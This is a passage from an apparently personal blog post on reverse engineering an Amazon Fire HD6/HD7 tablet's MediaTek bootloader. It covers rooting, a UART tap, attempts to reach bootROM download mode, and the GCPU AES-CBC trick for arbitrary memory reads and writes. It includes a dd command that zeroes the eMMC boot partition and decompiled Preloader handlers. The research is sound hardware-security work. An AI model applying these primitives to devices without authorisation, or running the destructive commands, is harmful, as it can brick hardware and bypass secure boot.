00000020  00 00 00 00 00 00 00 00  ff ff ff ff ff ff ff ff  |................|
00000030  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
r0rt1z2@r0rt1z2-pc: $
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Success! We&apos;ve obtained a clean dump of the second Preloader stage image. Regarding the other parts of firmware, everything was similar, if not identical, to the Fire 7 2015. Both LK and the rest of the TZ function the same way, and FireOS has the same structure. For those interested, I have uploaded a full dump on my dumpyard.&lt;/p&gt;
&lt;h2&gt;Rooting the device&lt;/h2&gt;
&lt;p&gt;To play it safe, I thought it would be best to root the device. Before acquiring it, I read XDA and informed myself about the available options.&lt;/p&gt;
&lt;p&gt;The latest versions of FireOS 5 are not rootable, but it&apos;s always possible to downgrade (without bricking) to FireOS 4.5.3 and root from there using KingoRoot (yes, I also hate these one-click root solutions too; they are the worst).&lt;/p&gt;
&lt;p&gt;The problem with this method is that KingoRoot requires an internet connection. If you connect to some Wi-Fi while on 4.5.3, Amazon will &lt;strong&gt;automatically&lt;/strong&gt; (and &lt;strong&gt;instantly&lt;/strong&gt;) download a software update and subsequently install it, causing a &lt;strong&gt;hard brick&lt;/strong&gt; on the device (I&apos;m speaking from experience :D).&lt;/p&gt;
&lt;p&gt;To avoid this, I decided to sniff out and extract whatever KingoRoot&apos;s black magic is, and put everything together into a ZIP file to create a safe offline rooting method. This method directly installs SuperSU instead of the usual Chinese bloatware! I won&apos;t go into details here, but if you want to see how it works, check out &lt;a href=&quot;https://xdaforums.com/t/root-twrp-downgrade-fire-hd7-hd6-ariel.4676003&quot;&gt;this XDA thread&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;shell@ariel:/data/local/tmp $ su
root@ariel:/data/local/tmp # id
uid=0(root) gid=0(root) context=u:r:init:s0
root@ariel:/data/local/tmp #
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(&lt;em&gt;g0t r00t!&lt;/em&gt;)&lt;/p&gt;
&lt;h2&gt;Accessing UART&lt;/h2&gt;
&lt;p&gt;As I mentioned earlier, an XDA user had posted the TX location on the HD6 board a few years ago, which made my life easier.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-uart.jpeg&quot; width=&quot;400&quot; alt=&quot;TX on the HD6&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;I decided to open up my HD7 to try to solder the TX connection, allowing me to more easily debug amonet, as UART is usually necessary for this process. I opened the back of the device and the first thing I found was a completely different PCB layout, which scared the hell out of me. Did this mean that finding the TX would not be as easy as I had hoped?&lt;/p&gt;
&lt;p&gt;Thankfully, my fears were unfounded. In the picture posted by the XDA user, you could see that the TX was part of what looked like a JTAG test point labeled &lt;code&gt;JDEBUG1&lt;/code&gt;. After a quick inspection of my HD7 board, I noticed the same label was present so my partner helped me to solder the pin in the same position as shown in the XDA image.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd7-uart.jpg&quot; width=&quot;400&quot; alt=&quot;TX on the HD7&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;To be able to close the back of the tablet, we made a hole in the right side of the chassis and carefully passed both cables through it. The result was pretty solid, and it still holds up just fine as I&apos;m writing this article!&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-case.jpg&quot; width=&quot;400&quot; alt=&quot;UART setup HD7&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;I plugged in the device and... voila! UART was working just fine, I was able to read the output of &lt;code&gt;PL0&lt;/code&gt;, &lt;code&gt;PL1&lt;/code&gt; and the rest of bootloader images:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[21:50:51.343] Waiting for tty device..
[21:50:56.839] Connected to /dev/ttyUSB0
[PL0] Build Time: 20140925-030705
[SD0] Bus Width: 1
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Accessing bootROM mode&lt;/h2&gt;
&lt;p&gt;Typically, on such devices, we&apos;d use the first stage of amonet, which exploits a vulnerability in bootROM to upload and execute custom payloads. However, to do this, we&apos;d need to access USDBL mode first, which is something nobody has been able to achieve on this particular device.&lt;/p&gt;
&lt;h3&gt;Volume keys&lt;/h3&gt;
&lt;p&gt;I decided to run &lt;code&gt;strings&lt;/code&gt; on the previously extracted &lt;code&gt;PL1&lt;/code&gt; image to check for any references to USBDL mode, and I found the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~$ strings PL1.img | grep -e &quot;emergency&quot; -e &quot;download&quot;
%s exit emergency dl mode due to time-out (%d ms, %d ms)
download keys are pressed
[RTC] clear emergency dl mode flag in rtc register
[RTC] emergency dl mode flag in rtc register is detected
%s emergency download mode(timeout: %ds).
[RTC] use pl dl mode for emergency dl mode
r0rt1z2@r0rt1z2-pc:~$
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Technically, if the image wasn&apos;t lying, this mode should be accessible through the volume rocker, similar to the first versions of the Fire 7 2015&apos;s Preloader. So, I decided to give it a try:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~$ lsusb | grep MT
Bus 003 Device 007: ID 0e8d:3000 MediaTek Inc. MT65xx Preloader
r0rt1z2@r0rt1z2-pc:~$ lsusb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After a few tries, I concluded no &lt;code&gt;MT6627&lt;/code&gt; (which is what bootrom identifies with) showed up at all, so this probably got patched by Amazon :(&lt;/p&gt;
&lt;h3&gt;Erasing Preloader from the eMMC&lt;/h3&gt;
&lt;p&gt;The next thing I tried was quite risky, but as we say in Spanish, &quot;&lt;em&gt;quien tenga miedo a morir, que no nazca&lt;/em&gt;&quot; (&lt;em&gt;those who fear death should not be born&lt;/em&gt;). It involves erasing &lt;code&gt;/dev/block/mmcblk0boot0&lt;/code&gt; so that bootROM fails to load the Preloader and falls back to USBDL mode:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;root@ariel:/ $ echo 0 &amp;gt; /sys/block/mmcblk0boot0/force_ro 
root@ariel:/ $ dd if=/dev/zero of=/dev/block/mmcblk0boot0 bs=512 count=8
8+0 records in
8+0 records out
4096 bytes transferred in 0.001 secs (4096000 bytes/sec)
root@ariel:/ $ echo -n EMMC_BOOT &amp;gt; /dev/block/mmcblk0boot0
root@ariel:/ $ reboot -p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... and it booted back to the OS, as if nothing happened! I double checked &lt;code&gt;mmcblk0boot&lt;/code&gt; and it remained intact so... what&apos;s exactly going on here?&lt;/p&gt;
&lt;p&gt;After hours of research, I discovered that the &lt;code&gt;persisbackup&lt;/code&gt; partition seemed to contain factory logs from when the device was first programmed and this is what I found:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Boot Area Write protection [BOOT_WP]: 0x04
  Power ro locking: possible
  Permanent ro locking: possible
  partition 0 ro lock status: locked permanently
  partition 1 ro lock status: not locked
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looks like Amazon locked down the first stage of Preloader on purpose... but why? That&apos;s something I discovered after hard bricking my Fire HD6.&lt;/p&gt;
&lt;h3&gt;Shorting the eMMC&lt;/h3&gt;
&lt;p&gt;I really didn&apos;t want to go to this extreme, as I only had my first HD6 at the time, but I decided to be brave and disassemble the device. Considering this method is meant to work in 100% of cases unless USBDL mode was disabled, I wondered: this is a 2014 device—did Amazon really disable it, like on newer models?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/ifixit-hd6.jpeg&quot; alt=&quot;iFixit HD6 motherboard&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As seen in the picture (courtesy of iFixit), everything is protected (or covered) by a soldered metal shield, so I had to use my soldering iron. Since I&apos;m not very skilled at soldering, I asked my partner, who has excellent soldering skills, to help me with this.&lt;/p&gt;
&lt;p&gt;The result was fairly good, except for the fact that we accidentally ripped off what seemed to be a capacitor related to the screen.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-result.png&quot; alt=&quot;HD6 motherboard&quot; /&gt;&lt;/p&gt;
&lt;p&gt;After that, I started playing the lottery (a very bad mistake—DON&apos;T ever try this at home) with what I thought could be &lt;code&gt;CLK&lt;/code&gt;, &lt;code&gt;CMD&lt;/code&gt;, or even &lt;code&gt;DAT0&lt;/code&gt;. Unfortunately, after a few shorts, I ended up killing the device to the point where it wouldn&apos;t even try to boot. So, there goes my first unit :D&lt;/p&gt;
&lt;h3&gt;UART. What&apos;s going on?&lt;/h3&gt;
&lt;p&gt;Since we had already found TX (which is enough to read &lt;strong&gt;UART&lt;/strong&gt; logs), I decided to see what was happening when trying to access USBDL mode, either by shorting or using the volume rocker. Here&apos;s what I discovered:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;key 1 is pressed
[LIB] invalid susbdl config &apos;0xEA000007&apos;
&amp;lt;ASSERT&amp;gt; seclib_dl.c:line 62 0
[PLFM] preloader fatal error...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&apos;s what happens when you press the volume down key while connecting the device to the PC. Apparently, the Preloader detects the key press and triggers an assert, which should cause a reboot to bootROM mode. Unfortunately, in my case, it rebooted normally  :(&lt;/p&gt;
&lt;h2&gt;Exploiting the Preloader&lt;/h2&gt;
&lt;p&gt;Having concluded that USBDL mode was not accessible, I decided to focus on exploiting the Preloader to gain arbitrary code execution and subsequently upload my own payloads.&lt;/p&gt;
&lt;p&gt;Since we know that both the Preloader and bootROM support the same commands, I decided to use the same method as the one employed for the Fire HD8 2018, which exploited the GCPU to read and write memory addresses arbitrarily.&lt;/p&gt;
&lt;p&gt;My initial goal was to dump the bootROM, but as you&apos;ll see later, I failed miserably. However, I did manage to achieve code execution in the Preloader, which is a significant result nonetheless. :)&lt;/p&gt;
&lt;h3&gt;What&apos;s bootROM?&lt;/h3&gt;
&lt;p&gt;After the CPU initializes, the internal SRAM controller pushes a jump instruction to the bootROM address. This is the first code that runs on the device, and it can&apos;t be modified. The bootROM takes care of initializing basic hardware such as flash storage, UART1 (the first serial port), loading the Preloader into the On-Chip SRAM, and jumping to it.&lt;/p&gt;
&lt;p&gt;While bootROM is usually located at &lt;code&gt;0x0&lt;/code&gt;, there are certain cases where that address contains a direct jump to either &lt;code&gt;0x00400000&lt;/code&gt; or &lt;code&gt;0x48000000&lt;/code&gt;, as seen in &lt;a href=&quot;https://github.com/chaosmaster/bypass_payloads/blob/master/generic_dump.c#L5&quot;&gt;&lt;code&gt;bypass_payloads&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~ $ hexdump -C 6572_0x0.bin | head -n 1
00000000  04 f0 1f e5 00 00 40 00  00 00 00 00 00 00 00 00  |......@.........|
r0rt1z2@r0rt1z2-pc:~ $ 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As seen above, the MT6572 contains the instruction &lt;code&gt;04 f0 1f e5&lt;/code&gt;, which translates (HEX -&amp;gt; ARM) to &lt;code&gt;LDR pc, [pc, #-4]&lt;/code&gt;. This instruction loads the value from address &lt;code&gt;0x4&lt;/code&gt; into the program counter (PC). Since this value is &lt;code&gt;0x00400000&lt;/code&gt;, the instruction effectively redirects execution to the actual bootROM code.&lt;/p&gt;
&lt;p&gt;Dumping bootROM is no easy task, as it requires you to do so within a privileged context. To understand what I mean, let&apos;s take a look at the ARM developer documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In the ARMv7 architecture, the processor mode can change under privileged software control or automatically when taking an exception. When an exception occurs, the core saves the current execution state and the return address, enters the required mode, and possibly disables hardware interrupts.&lt;/p&gt;
&lt;p&gt;Applications operate at the lowest level of privilege, PL0, previously unprivileged mode. Operating systems run at PL1, and the Hypervisor in a system with the Virtualization extensions at PL2. The Secure monitor, which acts as a gateway for moving between the Secure and Non-secure (Normal) worlds, also operates at PL1.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/arm-privileges.png&quot; alt=&quot;ARMv7 privilege levels&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;To make things easier to understand, let&apos;s just say that on the MT8135, which is ARMv7-based, both the Preloader and the TEE run at the most privileged state. Meanwhile, the Little Kernel (second bootloader) and the kernel operate at a lower privilege level.&lt;/p&gt;
&lt;h3&gt;Understanding the GCPU exploit&lt;/h3&gt;
&lt;p&gt;The GCPU is a SoC peripheral designed for decrypting encrypted media, featuring a microcontroller core (Control CPU or CCPU) equipped with ROM, SRAM, and hardware accelerators for various cryptographic algorithms including AES, SHA, MD5, RC4, DES, CRC32, and DMA.&lt;/p&gt;
&lt;p&gt;The Control CPU (its microcontroller core) operates with a 22-bit instruction set and includes 32 general-purpose 32-bit registers, instruction ROM, instruction RAM, and data RAM.&lt;/p&gt;
&lt;p&gt;Direct interaction with the GCPU is achieved by writing to its memory-mapped registers within the SoC&apos;s address space. During the boot process, at least on Amazon devices, both the Preloader and the LK (bootloader) use the GCPU to verify the integrity of the images before loading them into memory. As usual, further reverse engineering of this process can provide deeper insights into the GCPU&apos;s functionality :)&lt;/p&gt;
&lt;p&gt;In my first attempts to dump bootROM, I didn&apos;t have arbitrary code execution capabilities in the LK. Thus, my access to the GCPU was solely through the Preloader.&lt;/p&gt;
&lt;p&gt;For my device, an older Preloader version exposed two commands to read and write memory addresses within a predefined range; &lt;code&gt;CMD_READ32&lt;/code&gt; and &lt;code&gt;CMD_WRITE32&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;As seen in the amonet source code, these can be used to read from and write to the GCPU&apos;s registers, and thus trigger cryptographic operations.&lt;/p&gt;
&lt;p&gt;To grasp how bootROM data was successfully dumped back then, we need to delve into the intricacies of &lt;strong&gt;AES-CBC&lt;/strong&gt; (Cipher Block Chaining) mode utilized during the decryption processes.&lt;/p&gt;
&lt;h3&gt;Reading data&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;AES-CBC&lt;/strong&gt; mode is a common encryption technique where data is encrypted block by block. Each block of data is &lt;strong&gt;XORed&lt;/strong&gt; with the ciphertext of the previous block before it is encrypted.&lt;/p&gt;
&lt;p&gt;During decryption, each block of ciphertext is decrypted and then XORed with the previous block&apos;s ciphertext to reconstruct the plaintext.  The very first block, however, uses an Initialization Vector (IV) in place of previous ciphertext, setting the stage for the encryption or decryption sequence.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/aes-cbc.png&quot; alt=&quot;AES CBC&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In this scenario, the attacker sets the &lt;strong&gt;IV&lt;/strong&gt; to zero. This is basically done so when the first block is decrypted, the absence of a previous ciphertext block means the plaintext is directly revealed and gets decrypted without any alterations, making it plainly visible.&lt;/p&gt;
&lt;p&gt;For example, let&apos;s consider a situation where at address &lt;code&gt;0x0&lt;/code&gt; the data looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0xDEADBEEFCAFEBABE13371337DEADBEEFCAFEBABE13371337
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This data represents two blocks of encrypted information (16 bytes each, given typical AES block size). If we set the IV to zero, the decryption would proceed as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Decryption of the first block:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ciphertext Block (C1)&lt;/strong&gt;: &lt;code&gt;DEADBEEFCAFEBABE13371337DEADBEEF&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IV&lt;/strong&gt;: &lt;code&gt;00000000000000000000000000000000&lt;/code&gt; (set to zero)&lt;/li&gt;
&lt;li&gt;Assume the AES decryption of &lt;strong&gt;C1&lt;/strong&gt; produces a block we&apos;ll call &lt;strong&gt;D1&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Plaintext Result (P1)&lt;/strong&gt;: Since the &lt;strong&gt;IV&lt;/strong&gt; is zero, &lt;strong&gt;P1&lt;/strong&gt; is equal to &lt;strong&gt;D1&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;(Normally, you&apos;d see an &lt;strong&gt;XOR&lt;/strong&gt; step here, but with an &lt;strong&gt;IV&lt;/strong&gt; of zero, it simply doesn&apos;t alter the output)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Decryption of the second block:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ciphertext Block (C2)&lt;/strong&gt;: &lt;code&gt;CAFEBABE13371337DEADBEEFCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IV&lt;/strong&gt;: &lt;code&gt;DEADBEEFCAFEBABE13371337DEADBEEF&lt;/code&gt; (previous ciphertext block)&lt;/li&gt;
&lt;li&gt;Assume the AES decryption of &lt;strong&gt;C2&lt;/strong&gt; produces a block we&apos;ll call &lt;strong&gt;D2&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Plaintext Result (P2)&lt;/strong&gt;: The decrypted output &lt;strong&gt;D2&lt;/strong&gt; is XORed with the previous ciphertext &lt;strong&gt;C1&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;(The &lt;strong&gt;XOR&lt;/strong&gt; operation mixes &lt;strong&gt;D2&lt;/strong&gt; with the first block&apos;s ciphertext, revealing the plaintext for this block)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With the &lt;strong&gt;IV&lt;/strong&gt; set to zero, the first block&apos;s plaintext is directly revealed, and each subsequent block&apos;s decryption is influenced by the ciphertext of the block before it. This is essentially what allowed xyz to dump the bootROM in chunks of 16 bytes at a time, since one could read out the generated plaintext after the first block was decrypted.&lt;/p&gt;
&lt;h3&gt;Writing data&lt;/h3&gt;
&lt;p&gt;A similar process can be used to arbitrarily write data to memory in chunks of &lt;strong&gt;16 bytes&lt;/strong&gt; using &lt;strong&gt;AES-CBC&lt;/strong&gt; mode. In order to archieve this, a fixed pattern is defined for XOR operations:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pattern = bytes.fromhex(&quot;4dd12bdf0ec7d26c482490b3482a1b1f&quot;).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This pattern is used to manipulate the data before it&apos;s actually processed by the AES decryption function. Following that, the 16 bytes of data are split into four 4-byte (32-bit) words.&lt;/p&gt;
&lt;p&gt;Each word is XORed with the corresponding word from the pattern. This XOR operation prepares the data in such a way that, when decrypted, it will result in the desired plaintext.&lt;/p&gt;
&lt;p&gt;In addition to that, the source address for the operation is set to 0, which has to be a valid address containing all zeroes. The destination address is set to the target address &lt;code&gt;addr&lt;/code&gt;, where the data should be written to. Lastly, another AES decryption gets triggered, which writes the manipulated data to the target address.&lt;/p&gt;
&lt;p&gt;For example, let&apos;s assume the attacker wants to write the following 16 bytes of data to the target address &lt;code&gt;0x1000&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0xCAFEBABE13371337DEADBEEFCAFEBABE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This data represents 16 bytes of information. If we follow the process outlined above, the data is manipulated as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Split the data into four 4-byte words:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x13371337&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xDEADBEEF&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Each word is XORed with the corresponding word from the pattern:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt; ^ &lt;code&gt;0x4dd12bdf&lt;/code&gt; = &lt;code&gt;0x872f9161&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x13371337&lt;/code&gt; ^ &lt;code&gt;0x0ec7d26c&lt;/code&gt; = &lt;code&gt;0x1df0c15b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xDEADBEEF&lt;/code&gt; ^ &lt;code&gt;0x482490b3&lt;/code&gt; = &lt;code&gt;0x96892e5c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xCAFEBABE&lt;/code&gt; ^ &lt;code&gt;0x482a1b1f&lt;/code&gt; = &lt;code&gt;0x82d4a1a1&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The source address for the AES operation is set to 0, and the destination address is set to &lt;code&gt;0x1000&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;By triggering the AES decryption, the XORed data gets transformed back to the original plaintext and written to the target address.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;My failed attempt to dump bootROM&lt;/h3&gt;
&lt;p&gt;I tried to replicate the same method on my device, but by using the Preloader&apos;s &lt;code&gt;CMD_READ32&lt;/code&gt; command to read the GCPU&apos;s registers. While I was able to read and write GCPU registers, and I could even execute cryptographic operations, every time I tried to read &lt;code&gt;0x0&lt;/code&gt;, the IV came out as zero :(&lt;/p&gt;
&lt;p&gt;After realizing I couldn&apos;t read anything from &lt;code&gt;0x0&lt;/code&gt;, I started to think that the second stage of the Preloader, which I&apos;m targeting, might be running under an insufficiently privileged context and the GCPU somehow knew that.&lt;/p&gt;
&lt;p&gt;In any case, I created a simple script to loop over the memory in chunks and try read operations everywhere until I hit something that is only zeros:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;with open(&quot;test.txt&quot;, &apos;w&apos;) as f:
    address = 0x0
    step_size = 0x1000
    try:
        while True:
            data = dev.aes_read16(address)
            if data.hex() != &apos;00000000000000000000000000000000&apos;:
                output = f&apos;aes16_read @ 0x{address:08x} = {data.hex()}&apos;
                print(output)
                f.write(output + &apos;\n&apos;)
            address += step_size
    except KeyboardInterrupt:
        print(f&apos;Last address: 0x{address:08x} (data: {data.hex()})&apos;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I left the script dumping memory overnight and when I woke up, I found out that it had crashed at &lt;code&gt;0xffff0000&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Current address: 0xffff0000, Block data: 00000000000000000000000000000000
Traceback (most recent call last):
  File &quot;/home/r0rt1z2/amonet/modules/main.py&quot;, line 204, in &amp;lt;module&amp;gt;
    main(dev, args)
  File &quot;/home/r0rt1z2/amonet/modules/main.py&quot;, line 39, in main
    data = dev.aes_read16(address)
           ^^^^^^^^^^^^^^^^^^^^^^^
  File &quot;/home/r0rt1z2/amonet/modules/common.py&quot;, line 222, in aes_read16
    self.write32(CRYPTO_BASE + 0xC04, addr)
  File &quot;/home/r0rt1z2/amonet/modules/common.py&quot;, line 171, in write32
    self.dev.write(struct.pack(&quot;&amp;gt;I&quot;, word))
                   ^^^^^^^^^^^^^^^^^^^^^^^
struct.error: &apos;I&apos; format requires 0 &amp;lt;= number &amp;lt;= 4294967295
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I open the file and found out it actually dumped a lot of memory! Apparently, it started dumping from &lt;code&gt;0x80000000&lt;/code&gt; and stopped when it reached &lt;code&gt;0xffff0000&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Uploading my own payload&lt;/h3&gt;
&lt;p&gt;After failing to dump bootROM, I decided to try to upload my own payload to the device. The first thing I did was to reverse engineer the Preloader to see how it handled Download Agents, since that was the only way to jump to something from the Preloader.&lt;/p&gt;
&lt;p&gt;To understand how it works, let&apos;s take a look at the &lt;code&gt;usbdl_handler&lt;/code&gt; function, which manages USB communication.&lt;/p&gt;
&lt;p&gt;The device waits for a specific magic sequence from the host to stay in Preloader mode and accept instructions. If the magic sequence isn&apos;t received within a set timeout, the device continues with the normal boot process.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int usbdl_handler(bldr_comport *comport, uint32_t hshk_tmo_ms) {
    memcpy(startcmd_, startcmd, 4);
    start = get_timer(0);
    comm = comport-&amp;gt;ops;
    uVar6 = 0;
    len32 = len32 &amp;amp; 0xffffff00;

    /*
     * handshake process begins here, the host has a few
     * seconds to send the magic sequence so the device
     * stays in Preloader mode and listens for commands.
     */
    while (true) {
        platform_wdt_kick();
        usbdl_get_byte(&amp;amp;cmd);

        if (cmd != 0xfe) {
            usbdl_put_byte(cmd); // echo back
        }
        // ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the magic sequence is received, the device enters a loop, continuously listening for instructions from the host.  If we take a look at some of the leaked BSPs, we&apos;ll find a list of commands that the Preloader supports.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define CMD_GET_HW_SW_VER          0xfc  // Get hardware and software version information from the device
#define CMD_GET_HW_CODE            0xfd  // Retrieve the hardware code that identifies the SoC model
#define CMD_GET_BL_VER             0xfe  // Get bootloader version currently running on the device
#define CMD_LEGACY_WRITE           0xa1  // Legacy write command for backward compatibility with older SoCs
#define CMD_LEGACY_READ            0xa2  // Legacy read command for backward compatibility with older SoCs
#define CMD_READ32                 0xD1  // Read 32-bit value from specified memory address within allowed range
#define CMD_WRITE32                0xD4  // Write 32-bit value to specified memory address within allowed range
#define CMD_JUMP_DA                0xD5  // Jump to Download Agent at fixed address after verification
#define CMD_SEND_DA                0xD7  // Send Download Agent binary to device memory for execution
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since I used &lt;code&gt;CMD_WRITE32&lt;/code&gt; in a lot of places, it&apos;s worth explaining how it works. This command is used to write a 32-bit value to a specific memory address. The host sends the command, the address, and the data to be written, and the device echoes back the address and data to confirm the operation.&lt;/p&gt;
&lt;p&gt;It&apos;s worth noting that there&apos;s a range check to ensure the address is within a valid range; otherwise, we wouldn&apos;t have to abuse the crypto engine at all.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        /*
         * there are quite a few cmds, but I skipped
         * their handlers to focus on CMD_WRITE32 which
         * is what we&apos;ll use.
         */
        uint32_t addr = 0;
        uint32_t data = 0;
        uint32_t len32 = 0;

        // receive the parameters from the host.
        usbdl_get_dword((uint32_t *)&amp;amp;base_addr);
        usbdl_put_dword((uint32_t)base_addr);
        usbdl_get_dword(&amp;amp;len32);
        usbdl_put_dword(len32);

        // check the alignment of the address.
        if (((uint)addr &amp;amp; 3) != 0) goto err_and_ret;

        // make sure the size is actually valid.
        if (len32 == 0) goto err_and_ret;

        // prevent overflow attacks.
        if (len32 &amp;lt;&amp;lt; 2 &amp;lt;= len32) goto err_and_ret;

        // check if the address range is valid.
        sec_region_check((uint32_t)addr, len32 &amp;lt;&amp;lt; 2);
        // ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, the device enters a loop to receive data from the host, writing each data packet to the specified memory address. This process continues until all data is written. Once complete, the function handles any additional instructions or finalizes the Preloader operations.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        /*
         * if we reach this point, all the checks have passed
         * and we can notify the host about it so he can start
         * sending us the data we need to write.
         */
        usbdl_put_word(0);

        for (index = 0; index &amp;lt; len32; index = index + 1) {
            usbdl_get_dword(&amp;amp;data);
            usbdl_put_dword((uint32_t)data);
            *(uint32_t**)(base_addr + index * 4) = data;
        }
    }
    /*
     * the rest of the command handler would follow here, I
     * decided to omit it to keep this portion more simple.
     */
    return 0; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The next interesting command is &lt;code&gt;CMD_JUMP_DA&lt;/code&gt;, which is used to jump to a Download Agent (DA) located at a (fixed) memory address.  Naturally, the DA downloaded by the host has to be signed for this command to actually work and not crash.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (local_41 == 0xd5) {
  usbdl_get_dword(&amp;amp;da_addr);
  usbdl_put_dword((uint32_t)da_addr);
  if (g_da_verified == 1) {
    status = 0;
  }
  else {
    status = 0x2001; // DA_IMAGE_SIG_VERIFY_FAIL
  }
  usbdl_put_word((uint16_t)status);
  if (status != 0) {
    dprintf(&quot;%s usbdl_jump_da: %x\n&quot;,&quot;[USBDL]&quot;,status);
    ASSERT(&quot;download.c&quot;,0x282,&quot;0&quot;); // crash and reboot
  }
  da_addr = &amp;amp;DAT_80001000;
  _da_arg-&amp;gt;magic = 0x58885168;
  _da_arg-&amp;gt;ver = 1;
  _da_arg-&amp;gt;flags = 3;
  // ...
  g_boot_mode = 100;
  bldr_jump((uint32_t)da_addr,0x80000ff4,0xc);
  // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, as we can see, if &lt;code&gt;g_da_verified&lt;/code&gt; is set to &lt;strong&gt;1&lt;/strong&gt;, the device will jump to the fixed address &lt;code&gt;0x80001000&lt;/code&gt; and execute the DA. If the DA is not verified, the device will crash and reboot.&lt;/p&gt;
